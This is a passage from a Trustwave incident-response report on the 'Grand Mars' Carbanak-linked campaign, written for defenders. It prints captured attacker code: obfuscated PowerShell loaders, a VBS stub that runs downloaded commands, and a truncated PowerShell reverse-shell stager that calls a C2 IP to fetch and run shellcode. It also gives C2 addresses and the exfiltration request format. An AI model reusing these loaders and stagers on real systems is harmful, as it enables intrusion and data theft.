final step TransbaseOdbcDriver.js executes LanCradDriver.vbs using wscript.exe.

18
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

On Error Resume Next

Set objShell = CreateObject(“Wscript.Shell”)
objShell.Run(“C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI
- ExecutionPolicy Bypass -C “”sal a New-Object;iex(a IO.StreamReader((a IO.Compression.
DeflateStream([IO.MemoryStream][Convert]::FromBase64String(

Figure 34. L
 aCradDriver.ini (truncated)

LanCradDriver.vbs
This script simply reads and executes the commands written in the LanCradDriver.ini file (by the
TransbaseOdbcDriver.js script).

Hash Type Value

MD5 4EC7088AAC32C94A7046810925BC1697
SHA-1 7B46BB249485B36C318D53FA070D945EA8DBF606
SHA256 313E38756B80755078855FE0F1FFEA2EA0D47DFFFCBE2D687AAA8BDB37C892F4
SSDeep 384:MuVpmKuHXtRY8DmPF86QIWL0z9T6l+aBUBiigzxPs2hRhi:UKgHRmPF86JW4z9T6lBUIiAPhfi

Table 3. H
 ashes of LanCradDriver.vbs

On Error Resume Next

Dim objFSO, strFile, ReadAllTextFile
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
Dim currDir, currDirPlus
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
currDir = objFSO.GetParentFolderName(Wscript.ScriptFullName)
currDirPlus = currDir
strFile = currDirPlus & “\LanCradDriver.ini”
Set objFile = objFSO.OpenTextFile(strFile,1,false,-1)
If objFile.AtEndOfStream Then
ReadAllTextFile = “”
Else
ReadAllTextFile = objFile.ReadAll
End If
objFile.Close
ExecuteGlobal ReadAllTextFile

Figure 35. L
 anbCradDriver.vbs

LanCradDriver.ini
As seen before TransbaseOdbcDriver.js connects to Google Docs and reads a cell located in a spreadsheet in
Base64 encoded format. After decoding, the data is then stored as a text file in LanCradDriver.ini

Hash Type Value

MD5 EADF92DE422989D86214AF7E4E5647D7
SHA-1 8427358C4C21B7A0C14D638DF1017D0A7FA21182
SHA256 DEA485D817D712A5B61A8F31123F914890183D2F9B0BF0F3AF89366085596D5D
SSDeep 192:1/qgqjmQDJ35cnrS+vDa4j4Sdp/qgqjmQDJ35cnrS+vDa4j4Sd5:8g32pSnrpa84+Ig32pSnrpa84+5

Table 4. H
 ashes of LanCradDriver.ini

The following is a PowerShell command retrieved from the Google spreadsheet and written to the LanCradDriver.ini
file post-execution of TransbaseOdbcDriver.js script on the infected system.

19
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

On Error Resume Next

Set objShell = CreateObject(“Wscript.Shell”)
objShell.Run(“C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -Execu-
tionPolicy Bypass -C “”sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.
MemoryStream][Convert]::FromBase64String(‘rVhtT+NIEv7uX9ETWYqjSawEhtGK00oXAuxEQyAimWHv2GjU2JWkD8edb
beB7Nz896tqtxPbMRyMlg/E7q56uqq6Xu0Ox+xX1vx44B/
… … … … (truncated) … … … … …
jKlOmDez/vDi7NTln0ygrC1p+bhLsljUMuEhrn8HavF2q4UI39vaUv3Pw==’),[IO.Compression.CompressionMode]::Dec
ompress)),[Text.Encoding]::ASCII)).ReadToEnd()”””),0, True
objShell.Run(“powershell.exe -NoP -NonI -ExecutionPolicy Bypass -C “”sal a New-Object;iex(a
IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(‘rVh-
tT+NIEv7uX9ETWYqjSawEhtGK00oXAuxEQyAimWHv2GjU2JWkD8edbbeB7Nz896tqtxPbMRyMlg/E7q56uqq6Xu0Ox+xX1vx44B
/0uv7Bkd876DUddyyVxvWjQ8f9KpROedSPIhngkhunUeS4AwVcw3SJP+Fu9YYLfS7VRMSLCK7u/gOB3m3+fnX9+exf+
… … … … (truncated) … … … … … /epSVJVi+dz+WUsUgMgO3acu69CHy731X7rV0tCYglqJOBPYVpfsNCM+OjqPFxgnN/3h
9Nt0ODq7+jKlOmDez/vDi7NTln0ygrC1p+bhLsljUMuEhrn8HavF2q4UI39vaUv3Pw==’),[IO.Compression.CompressionM
ode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()”””),0, True

Figure 36. L
 anCradDriver.ini (truncated)

Notice above the usage of Base64 encoding and Deflate in order to conceal the actual PowerShell code.
Upon successful execution of TransBaseOdbcDriver.js this is how the folder contents look. Note that
LanCradDriver.ini is no longer a zero-byte file since it has been populated using the commands retrieved from
the Google spreadsheet.

Figure 37. L
 anCradDriver.ini populated post-execution of TransbaseOdbcDriver.js

Activity Summary
In summary, the role of the four dropped files is visually represented by the following activity diagram:

Figure 38. R
 ole of dropped files and sequence of execution

20
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The following diagram is a visualization of the Command & Control mechanism used by the malware during this
operation that involves use of Pastebin, Google Docs (spreadsheets), and Google Forms to exert control over the
infected systems.

Figure 39. A
 ctivity diagram showing C&C involving Google Forms and Docs

21
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 40. A
 ctivity diagram showing C&C in case Google Spreadsheet not available

Using such a topology of C&C, while not rare, further indicates that we are dealing with a highly organized and
sophisticated group of attackers rather than an opportunistically motivated, relatively unorganized group or lone
wolf attackers.

22
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

ACHIEVING PERSISTENCE
PowerShell Script
At this point the recently downloaded from Google Docs PowerShell script was decoded and executed on the
infected system. As seen in Figure 36 the actual script used PowerShell Deflate and Base64 functions to conceal
the payload. After reversing these functions, the output indicates that this script was designed to setup a form of
persistent backdoor often referred to as a TCP reverse connect shell.
The following results has been derived:
• Script connects to an external IP using a common port such as 80. However, it is not using HTTP protocol for transmission.
• Memory allocation and thread creation code exist.
• It receives an encrypted (XOR) payload from the external IP.
• The payload is then decrypted using XOR key of 0x50 and written directly to memory.

$IP = ‘80. 84.49.61’

$Port = 80
$XORKEY = 0x50
$VirtualAlloc = $null
$CreateThread = $null
$WaitForSingleObject = $null
$XORKEY = 0x50
function XorByteArr
… … … … (truncated) … … … … …
{
$tcpClient = New-Object System.Net.Sockets.TCPClient
Try
{
$connect = $tcpClient.Connect($IP, $Port)
}
… … … … (truncated) … … … … …
$stream = $TcpClient.GetStream()
$payloadSizeBuff = New-Object Byte[] -ArgumentList 4
$Null = $stream.Read($payloadSizeBuff, 0, 4)
[Int]$payloadSize = [System.BitConverter]::ToInt32($payloadSizeBuff, 0)
Write-Output “Payload size - $payloadSize”
[IntPtr]$shellcodeBuff = $VirtualAlloc.Invoke([IntPtr]::Zero, [Math]::Max([Int]($payloadSize + 5),
0x1000 ), 0x3000, 0x
40)
[System.Runtime.InteropServices.Marshal]::WriteByte($shellcodeBuff, 0, [Byte]0xBF)
[System.Runtime.InteropServices.Marshal]::WriteIntPtr($shellcodeBuff, 1, $tcpClient.Client.Handle)
$shellcodeBuffTmp = New-Object Byte[] -ArgumentList $payloadSize
[Int]$bytesRead = 0
While ($payloadSize -gt $bytesRead)
{
[Int]$netAnswerSize = $stream.Read($shellcodeBuffTmp, $bytesRead, $tcpClient.Available)
$bytesRead += $netAnswerSize
}
$shellcodeBuffTmp = XorByteArr $shellcodeBuffTmp $XORKEY
Copy-ToUnmanagedMem $shellcodeBuff $shellcodeBuffTmp 5 $payloadSize
Write-Output “Received payload, run it in a new thread”
$threadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $shellcodeBuff, [IntPtr]::Zero, 0,
[IntPtr]::Zero)
if ($threadHandle -ne [IntPtr]::Zero)
{
Write-Output “Successfully created thread!”
Write-Output “Meterpreter session created!”
}
… … … … (truncated) … … … … …

Figure 41. T
 CP Reverse Shell from a PowerShell script
23
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The final result of the above script is a memory resident malware providing reverse shell access to cybercriminals.
Attackers have now successfully achieved persistence into the target infrastructure. The PowerShell command used
to decode and execute this script along with the method of delivery has many similarities with “PowerSploit - A
PowerShell Post-Exploitation Framework” and “Veil Framework” well known capable of Antivirus evasion of payloads.

Registry Autorun
Additionally, attackers have achieved persistence by utilizing the “usual suspects” also known as the operating
system’s startup locations. The following key is created in the registry to start the payload automatically after reboot.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TransbaseOdbcDriver

Figure 42. R
 egistry persistence

Task Scheduler
Finally, a scheduled task has been created which is triggered every 30 minutes indefinitely. The name of the created
task is SysChecks and it executes the starter.vbs.

Figure 43. S
 ysCheks Scheduled Task persistence

Everything has been copied under the user temporary directory. “C:\Users\<user profile>\AppData\Local\Temp”,
which is also very common among malware operations because every user maintains full access within this
specific directory.

24
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

LATERAL MOVEMENT
Pass the Hash
Another consequence of the initial phase of this compromise is that attackers gained access to a local Windows OS
administrator account and then utilized pass-the-hash in order to steal credentials of a domain level, high privileged user.

Figure 44. E
 vent showing Pass-the-Hash indicators

Event ID 4624 displayed above shows the use of a local account performing network logon (Logon Type:3) using a
randomized source computer name (Workstation Name: T5NMapiY4kGetJDe), probably the result of an automated tool.
Pass the hash is a technique where attackers, after successfully taking control of a system, steal credential hashes
that are then used to perform authentication to other systems. This technique always benefits attackers especially if
local accounts share the same password within the infrastructure.
Ultimately this allowed attackers to achieve domain or even enterprise admin access and gain network access by
utilizing several resources as Command & Control points in Europe and US.
Further investigation of the attacked infrastructure showed that the intruders deployed similar PowerShell scripts or
embedded batch files in order to spread within the environment. A large number of internal systems recorded events
similar to the ones listed below:

25
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Source: Service Control Manager

Date: 09/11/2016 15:40:21
Event ID: 7045
Task Category: None
Level: Information
Keywords: Classic
User:
Computer:
Description:
The description for Event ID 7045 from source Service Control Manager cannot be found. Either the
component that raises this event is not installed on your local computer or the installation is
corrupted. You can install or repair the component on the local computer.

If the event originated on another computer, the display information had to be saved with the
event.

The following information was included with the event:

EdAeEJcGXdXJBHeX
%COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\EyzxpCpBHlaNQvIb.bat
user mode service
demand start
LocalSystem

Figure 45. B
 atch file used for spreading

Log Name: System

Source: Service Control Manager
Date: 09/11/2016 19:31:29
Event ID: 7045
Task Category: None
Level: Information
Keywords: Classic
User:
Computer:
Description:
The description for Event ID 7045 from source Service Control Manager cannot be found. Either the
component that raises this event is not installed on your local computer or the installation is
corrupted. You can install or repair the component on the local computer.

If the event originated on another computer, the display information had to be saved with the
event.

The following information was included with the event:

db57729
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA-
GIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByA-
G8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMADEAWAAvAFcALwBhA-
FAAQgBEACsAdQBmAHcAVgAwAFYAUQBwAGkAVQBvAEoAVQBOAFoAMQBrAHkAYgBOAGYASQBjAEIAaABhAFoAUQBLAEUAUABJAEo-
ARQA1AHcANgA4AFEAMABkAGsAcgBwAHQAdgAvADkAdgBYAHoAUQBzA
… … … … (truncated) … … … … …
vD89IRln4wgbO2pebAr8pjUMqHLXP6O3WJtV4qZv7e0pfsH’),[IO.Compression.CompressionMode]::Decompress)),[T
ext.Encoding]::ASCII)).ReadToEnd()”
user mode service
demand start
LocalSystem

Figure 46. P
 owerShell script used for spreading

During this operation several PowerShell scripts were discovered similar to the initial one downloaded from Google
Docs. The major difference among them was the C&C IP, which was one of several hosts located in Europe. 
26
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

FURTHER MALICIOUS FILES

A Forensics Timeline Analysis of file system activity around the same time and date as that of the
TransbaseOdbcDriver.js and other companion files that were dropped into the user’s Temp folder, revealed the
following suspicious executables/scripts:
1. AdobeUpdateManagementTool.vbs (connect to C&C and perform data exfiltration)
2. UVZHDVlZ.exe (variant of Carbanak)
3. Update.exe (Cobalt Strike’s post-exploitation tool beacon)
4. 322.exe (TCP reverse shell)
Analysis of these executables found them to be of a malicious nature and primarily designed to setup persistence or
data exfiltration.

AdobeUpdateManagementTool.vbs
Malicious script written in VBScript capable of receiving commands from the attacker to download and execute EXE files,
VBScript or PowerShell script files. Exfiltrated data is sent to the attacker’s IP addresses through HTTP POST tunnel.
While the filename observed in our investigation was AdobeUpdateManagementTool.vbs it is common for attackers
to use different file names in different campaigns. The hashes that identify this file uniquely (and useful in threat
detection and malware analysis) are:

Hash Type Value

MD5 CE7E9C3FB2872D4F500FED248228C3AC
SHA-1 F040E484DA423540E0A398BAA57E00226A7689D9
SHA256 DDBF9963FE77ABDF97DE51A27509432ED963657D5F598E2179CEC882B0335334
SSDeep 192:1/qgqjmQDJ35cnrS+vDa4j4Sdp/qgqjmQDJ35cnrS+vDa4j4Sd5:8g32pSnrpa84+Ig32pSnrpa84+5

Table 5. H
 ashes of AdobeUpdateManagementTool.vbs

AdobeUpdateManagementTool.vbs, on execution, drops the following files after creating a folder

%AllUsersProfile% + “\Dropebox” + <username> (for example: C:\ProgramData\DropeboxJoePC):
• screenshot__.ps1: PowerShell script that takes a screenshot of the active desktop
• screenshot__.png: Screenshot image captured by the PS script above is stored in this file
• exe__.exe: Executable file sent by the attacker
• vb__.vbs: VBscript sent by the attacker
• ps1__.ps1: PowerShell script sent by the attacker
• insatller.vbs: Updater VBS script sent by the attacker
This malicious script sends a specially crafted request to the attacker’s Command & Control server and receives
hashed (MD5) commands back from the server in response. These commands are then executed on the
compromised system.

27
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Command in
Description of the command
clear text

info Gets system information and sends it to the C&C server via a HTTP POST request.
proc Enumerates all running process.
Captures screenshot of the desktop image (this command first drops and executes the file
scrin screenshot ps1 and the image is saved to screenshot .png. The image is then sent to the C&C
server through HTTP POST tunnel).
Attacker sends this command with an accompanying executable file that is saved to exe .exe. The
exe
exe file is transient for a very short period of time on the system before getting deleted.
Attacker sends this command with an accompanying VBScript that is saved as vb .vbs.
The script is executed and the result returned is base64 encoded by the script and saved
to a temporary file in Windows %temp% folder. The result is sent to the control server
vbs through HTTP POST tunnel (see exfiltration detail below). Both files result and script files
are deleted after the execution.
The results file has the following text format:
type: vbs time: {current time} result: {output}

Provides a VBScript updater along with this command. The updater script is saved to
the file insatller.vbs and then executed. The updater uninstalls its old version. This file,
update
like others, is only briefly present on the file system and is deleted 10 seconds after
execution.
The C&C server sends this command with an accompanying PowerShell script that is
saved to the file ps1 .ps. The script is executed and the results returned by the script
are base64 encoded and saved to a temporary file in Windows %temp% folder. The
ps1 results are sent to the C&C server via a HTTP POST tunnel. Both files result and script
files are deleted after the execution.
The results file has the following format:
type: ps1 time: {current time} result: {result details}

Table 6. E
 xamples of supported commands

The resulting data upon execution of every command, is exfiltrated via a HTTP POST request to the C&C server as
shown below:

POST /{random_name}.jsp?pId==={unique ID %md_id%}<<$>>{MD5 hash of Date & Time Now} <- encrypted in
RC4 with hardcoded key. The POST parameters may also be iterated up to 3 times.
User-agent: Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC Pyramid Build/GRI40) AppleWebKit/533.1
(KHT ML, like Gecko) Version/4.0 Mobile Safari/533.1
Charset:utf-8
Connection: Keep-Alive
Keep-Alive:300
Content-Type: “multipart/form-data; boundary=”{Random MD5 hash}”

Figure 47. H
 TTP POST request used to exfiltrate data from compromised system

28
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The HTTP POST uses the body format below:

--{random MD5 hash}

Content-Disposition: form-data; name=”{random name}”
{unique ID and current Date/Time Hash - encrypted with RC4 and Base64}
--{random MD5 hash}
Content-Disposition: form-data; name=”{random name}”
pPar1c==={unique ID encrypted with RC4 and Base64}
--{random MD5 hash}
Content-Disposition: form-data; name=”{random name}”
pPar2c==={command’s MD5 Hash encrypted with RC4 and Base64}
--{random MD5 hash}
Content-Disposition: form-data; name=”{random name}”
pPar3c==={Results/Data/StolenInformation encypted with RC4 and Base64}

Figure 48. H
 TTP POST method options

The script enters sleep mode for 3-5 minutes between each send “command – exfiltrate results” cycle before
running again.
The following command and control servers were identified (it is trivial for attackers to keep changing their command
& control servers so these IPs will most likely be different in other campaigns):
• 148.251.18.75
• 95.215.46.221
• 95.215.46.229
• 95.215.46.234
• 81.17.28.124
This file was not detected as malicious by ANY anti-virus tools as reported by VirusTotal. This is definitely a sign of
sophistication of malware and that of the threat actors behind these attacks.

UVZHDVlZ.exe
This file is a loader for the Anunak malware which is encrypted and embedded inside this executable. The payload
(Anunak) executable then is injected to svchost.exe and provides backdoor capabilities for attackers to connect to
and achieve persistent access to the compromised system. The file hashes associated with this executable are:

Hash Type Value

MD5 DD4F312C7E1C25564A8D00B0F3495E24
SHA-1 499E162CF3A80673890BF7FC9FCBFA51B58DAF45
SHA256 DDAB9C2F975D336A698F4604AC755586C5451AC8DA0A98ECC5D9B8F6993D4E78
SSDeep 6144:T3bX85EjXVQqUzbxHSFOrME+mcNUE27UB:PX85EjFXqZSAMocKc

Table 7. H
 ashes of UVZHDVlZ.exe

Initially, the main executable decrypts two code modules embedded in its body using the XOR key “PsdTsr8fer3”
(without the quotes):
• The payload loader/process injector
• The payload itself - Anunak malware Win32 executable
The decryption operation is as simple as the encryption, i.e. to XOR the code with the key, skipping every 3 bytes (we
have discovered the decryption routine used but have not reproduced the details in this report to maintain brevity).

29
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The XOR key was identified after disassembling the executable and finding the instruction used to copy the XOR key
to a heap to be used later for decrypting the loader and embedded executable (see below).

Figure 49. X
 OR key detection

As mentioned, the Anunak payload loader is decrypted first followed by decryption of the Anunak malware executable:

Figure 50. P
 ayload decoding

Figure 51. S
 tarting Anunak after decrypting it

The following command and control servers were identified:

• 179..43.140.85 (port: 443)
• 107.181.246.189 (port: 443)
The execution flow of this malware may be visualized (using the Procdot tool [6]) as follows:

Figure 52. P
 rocdot visualization of UVZHDVIZ.exe.

Interestingly, uvzhdviz.exe is signed using a valid digital certificate issued by a Comodo CA, and appears to have
been purchased by providing possibly forged identity information of a company based in Moscow, Russia.

30
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 53. D
 igital certificate details of UVZHDVIZ.exe (Grand Mars)

UVZHDVlZ.exe was not detected as malicious by ANY anti-virus tools as reported on VirusTotal. This is another
indicator of expertly crafted malware and sophistication of the attackers behind this campaign.

Update.exe
This executable, like the Anunak loader executable described in the analysis in the previous section, is also signed
using a digital certificate issued by Comodo CA and purchased mere weeks before the malware campaign that is
the subject of this report. As with the other certificate used to sign the Anunak loader executable, this certificate was
also issued using the details, probably fake, of a company based in Moscow, Russia.

Hash Type Value

MD5 BACE8F2B09C2BFAB35ED9ED98B2E1B83
SHA-1 188D751B7530DB668B88BDB96EDA50A08C119850
SHA256 321BA0DFFEE63518BFE24FF02C0DF6A09692A5D32BCC33AA454AC7431D390F57
SSDeep 6144:T3bX85EjXVQqUzbxHSFOrME+mcNUE27UB:PX85EjFXqZSAMocKc

Table 8. H
 ashes of Update.exe

31
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 54. D
 igital certificate details of update.exe

This executable file is actually a loader that creates a new thread of Cobalt Strike’s post-exploitation tool called
Beacon. The Beacon DLL is encrypted and embedded in the malware body.
Initially, the main executable decrypts two code modules embedded in its body:
• Loader Code (itself)
• Payload PE File (embedded in its body)
As with the Anunak loader executable described in the previous section, this file also uses XOR with the following
key “keDx8” (without the quotes) identified during the analysis of the disassembled code for both encryption and
decryption operations for both the loader code and the embedded PE executable. The figure below shows the
disassembled code for decrypting the XORed code.

Figure 55. D
 ecryption routine with XOR key

32
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The figures below show the encrypted/decrypted loader and PE executable (payload):
First the loader code:

Figure 56. L
 oader Code

Then the payload PE executable file:

Figure 57. P
 E Executable

After successfully decrypting the payload executable, the payload is executed in memory.
When the payload is executed, it first allocates memory where it will hold the decrypted beacon DLL.

Figure 58. M
 emory allocation for payload

It will then decrypt the DLL file. This is once again done by XORing the encrypted DLL against a block of seemingly
random keys.

Figure 59: R
 outine to decrypt beacon DLL

Figure 60. D
 ecrypted beacon DLL

It will then load the DLL to a new thread. The beacon is compiled as a reflective DLL [7]. This allows various payload
stagers and the stage less artifacts to inject beacon into memory.

33
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 61. R
 eflective beacon DLL

The beacon DLL loops indefinitely and sleeps for 10 secs between each loop iteration.
This executable implements a technique to detect the presence of malware detection/AV tools on the compromised
system and/or the network. It connects externally and downloads from a hardcoded host the EICAR Anti-Malware
test string. This text is a special ‘dummy’ string for testing security controls such AV software, IDS etc. This is an
indication to the malware that there are no AV tools on the compromised system.
The following command and control servers was used:
• 95.215.44.12 (HTTP)

Figure 62. E
 ICAR test string in X-Malware field

This executable file was not detected as malicious by ANY anti-virus tools as reported by VirusTotal as of date of
writing this report.

322.exe
The role of this executable named 322.exe, upon analysis, was found to establish persistent access to the
compromised system using a TCP reverse connect backdoor.
The file hashes are provided in the table below:

Hash Type Value

MD5 5F73BEB23C45006AD952A71FA62C6F9F

SHA-1 14F5092E2E25EC5479FF5E0F7515A6F17674A845

SHA256 191BDA73661A99E7F2FBE746F4D6105076F1E5A690B124D5F381E218626CA1C2

SSDeep 192:jgm5OgVo4KCobo7y/+KDRSe5fOw81j5NkDQ23C+xan9xpNhhwZhf9UVF8:H1JKCobou/+KtSLjoD5nqxIDf9UVO

Table 9. H
 ashes of 322.exe

This executable checks for an AV process on the infected system and based on what it finds, either executes a new
process “wuauclt.exe” (if AV found), or “svchost.exe -k netsvcs”. If it is unable to execute the previous command, it
spawns explorer.exe.
34
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

On analysis of the disassembled executable code, this malware was found to accept the following three command
line arguments: {transport} {LHOST} {LPORT}
For example: 322.exe 4 127.0.0.1 53
It was also found that the {transport} option can have the following valid values:

(transport} option Interpretation

0 reverse_tcp_connect with no payload encryption

3 simple bind_tcp shell

4 reverse_tcp_connect with encrypted payload

Table 10. V
 alid {transport} command line options for 322.exe

When the executable is run with one of the three valid options in the table above (along with the correct IP:port
combination), it receives a DLL payload from the IP, and injects it reflectively [7] to the process it successfully
spawned (wuauclt.exe or svchost.exe or explorer.exe). It then transfers the execution to that process. This in turn
provides the attackers with one of the three types of command shell access to the compromised system.
It’s not the first time that cybercriminals have utilized well-known tools since the executable is nothing more than a
customized Metasploit stager responsible for downloading and executing the reverse TCP. The final step of 322.exe
is to delete itself from the file system in order to leave no trace behind.
VirusTotal score for this malware executable was 8/57 as of last analysis. The low score, combined with the findings
of the analysis of the file is indicative of a high level of sophistication on the part of the malware authors in being
able to effectively evade a majority of the AV tools.
 

35
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Conclusions
During the investigations of several malicious executables, obfuscated PowerShell commands and scripts of Visual
Basic and JavaScript were discovered as listed in Appendix A. Some of the executables after being downloaded by
their parent process were written directly into memory and then reflectively injected [7] into other processes as DLLs
and were deleted after performing their role. Likewise, the extended usage of PowerShell commands gives the
advantage to adversaries of “diskless” aka “memory resident malware” hidden behind the process of their scripting
host. Also the practice of utilizing scripts which are flexible by nature is another strong advantage to attackers
allowing them to effortlessly modify their code.
Additionally, the use of so many different types of malicious software strongly indicates that several entities are
cooperating and communicating in the underground markets to exchange tools and techniques. It is also possible
that some of the attack’s stages have been performed by different malicious groups of people and then other groups
have carried on.
Likewise, the number of network hosts used globally as extraction points or Command & Control Servers is another
indicator of organized crime operations. Their location and role is depicted below in the European region map (note:
Three servers located in N. America not shown for simplicity).

Figure 63. M
 alicious hosts geolocation

The fact that someone purchased and used legitimate digital certificates issued from a reputable CA (Comodo)
using valid or probably fake identities, of Russian origin with details in Moscow, (Grand Mars and Forsajt Ynvest) is
another piece of circumstantial evidence pointing to the involvement of organized cybercrime network with strong
motivation to these attacks.

36
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The proximity of the signature timestamps (indirectly its creation date) to the timeline of attacks suggests strongly
that the actors purchased these certificates specifically for use in this operation. Had these digital certificates been
stolen or “borrowed” from a valid company, it is unlikely for there to have been such strong correlation between the
timeline of the attacks and the date/time that the certificates were generated by the CA.
Furthermore, the Pastebin URL used in the attacks as part of the command & control mechanism by the attackers
belongs to an individual identified as “Shtokov”. This is yet another (weak) indication of the involvement of Russian/
Eastern European actors in these attacks.

Figure 64. S
 htokov Pastebin site used in Command and Control

Using services such as Google Docs in order to keep track of victims and spreading malicious files becomes a very
big challenge for defenders because this way is very difficult to distinguish between good and bad guys using these
popular public cloud services.
Finally, the attack characteristics of this family of malware share several common traits with the, original, well
understood Carbanak APT campaign, which has been positively attributed to the Russian underground financial
cybercrime network.
The only thing that we can be sure is that attackers will not stop seeking new and innovative ways of infecting
corporate environments and manipulating public services, which are considered loyal and trustworthy from
the public.  

37
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Remediation
Based on the findings of our investigation across several cases now dubbed to be part of the “Grand Mars”
APT campaign, Trustwave SpiderLabs recommends the following remedial measures to be put in place both to
effectively negate or minimize the damage caused due to the attacks, and to proactively address the threat prior to
its realization.

TACTICAL (SHORT TO MEDIUM TERM) COUNTERMEASURES

• Regular security awareness trainings for all personnel.
• Disable execution of VBS/VBE/macros from Internet based documents.
• Prohibit execution of files (EXE, VBS etc.) from folders such as AppData, User’s Temp.
• Disable full unrestricted Internet access where not required.
• Minimize the number and usage of administrator accounts.
• Prevent regular users from logging in as administrators.
• Implement application layer filtering for widely used protocols such as HTTP etc.
• Create unique passwords for local user and administrators and change them frequently.
• Limit administrative access only to those systems required.
Since the malware is primarily memory resident, with no disk or file-system level changes made to the host system,
the following checks are recommended to be carried out on all endpoints, servers, and the network. We recommend
to check for indicators of:
• Service(s) with randomized names installed and started on the system
• Service(s) executed from:
• A PowerShell command/script
• A suspicious/randomized command, program or binary of unknown origin and purpose
(such as Update.exe/322.exe noted in our report).
• A batch (.bat) script with a randomized name
• Systems making (or attempting to make) network connections to an external IP, especially on common ports
such as 110, 53, 80, 443, 8080 commonly allowed on firewalls for outbound connections but without using the
actual protocols for these ports.
• Scheduled tasks and OS Autoruns locations.
For a full list of IP addresses and malicious hosts/domains contacted by the malware in this report, please review
the Table of IOCs at the end of this section.

KEY INDUSTRIES BE AWARE

It is highly recommended that organizations within the retail, e-commerce and hospitality industries implement
strategic countermeasures immediately. Undertake a thorough compromise assessment proactively rather than
wait for the first signs of attack. Perform a comprehensive threat hunt, using information from this Advanced Threat
Report, across the network, including servers and endpoints, to identify any signs of malicious activity. Finally,
evaluate your current incident response capability to identify gaps that affect your organizations ability to respond.
No organization can deliver protection against all attacks. But your ability to effectively disrupt an attack, and
respond quickly and effectively, will have a long-term impact on your survivability in the face of advanced attacks
like Grand Mars.

  38
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Appendix A: Files

File name Hash (SHA256) Comments

Email word
1-list.docx 803009B5CF8D663A2FA3E20651CBDD57DA25908366D886C2EEBC1A4BF7DFC3F0
attachment

Encrypted vbs from

oleObject1.bin EC3980961C6145C96C1220188C6C06AC192AB4B5C4B2E335A96715DE43C62FDB docx (unprotected.
vbe)

Data copied from

dttsg.txt 22F59C3CDABCECF9F71826D1BCE84FE227462142A437E76DC43046DBC63CE1E8
pastebin

PS1 script
LanCradDriver.ini DEA485D817D712A5B61A8F31123F914890183D2F9B0BF0F3AF89366085596D5D downloaded from
Google Docs

Caller for
LanCradDriver.vbs 7683A9760AED259636C8623B577446406FF22E478CC33FA3095F681F54C2AF3B
LanCradDriver.ini

Scheduled task
(SysChecks) calling
starter.vbs 270A776CB9855F27452B35F072AFFBBC65023D4BB1F22E0C301AFD2276E7C5EA
TransbaseOdbc-
Driver.js

Google Docs
TransbaseOdbcDriver.js 313E38756B80755078855FE0F1FFEA2EA0D47DFFFCBE2D687AAA8BDB37C892F4 + Pastebin
communicator

Carbanak, signed
UVZHDVlZ.exe DDAB9C2F975D336A698F4604AC755586C5451AC8DA0A98ECC5D9B8F6993D4E78 file with Comodo
certificate

Config file for

UVZHDVlZPVBfXFBeVA.bin B84C629AC6AB3F8E03D8A52E8D3E874634C1645154C310F18B8F9FBB9D26BA41
previous exe

Reflectively injecting
322.exe 191BDA73661A99E7F2FBE746F4D6105076F1E5A690B124D5F381E218626CA1C2
dll for reverse shell

AdobeUpdateManagementTool. Communicating with

DDBF9963FE77ABDF97DE51A27509432ED963657D5F598E2179CEC882B0335334
vbs various C&C

Cobalt Strike's
post-exploitation
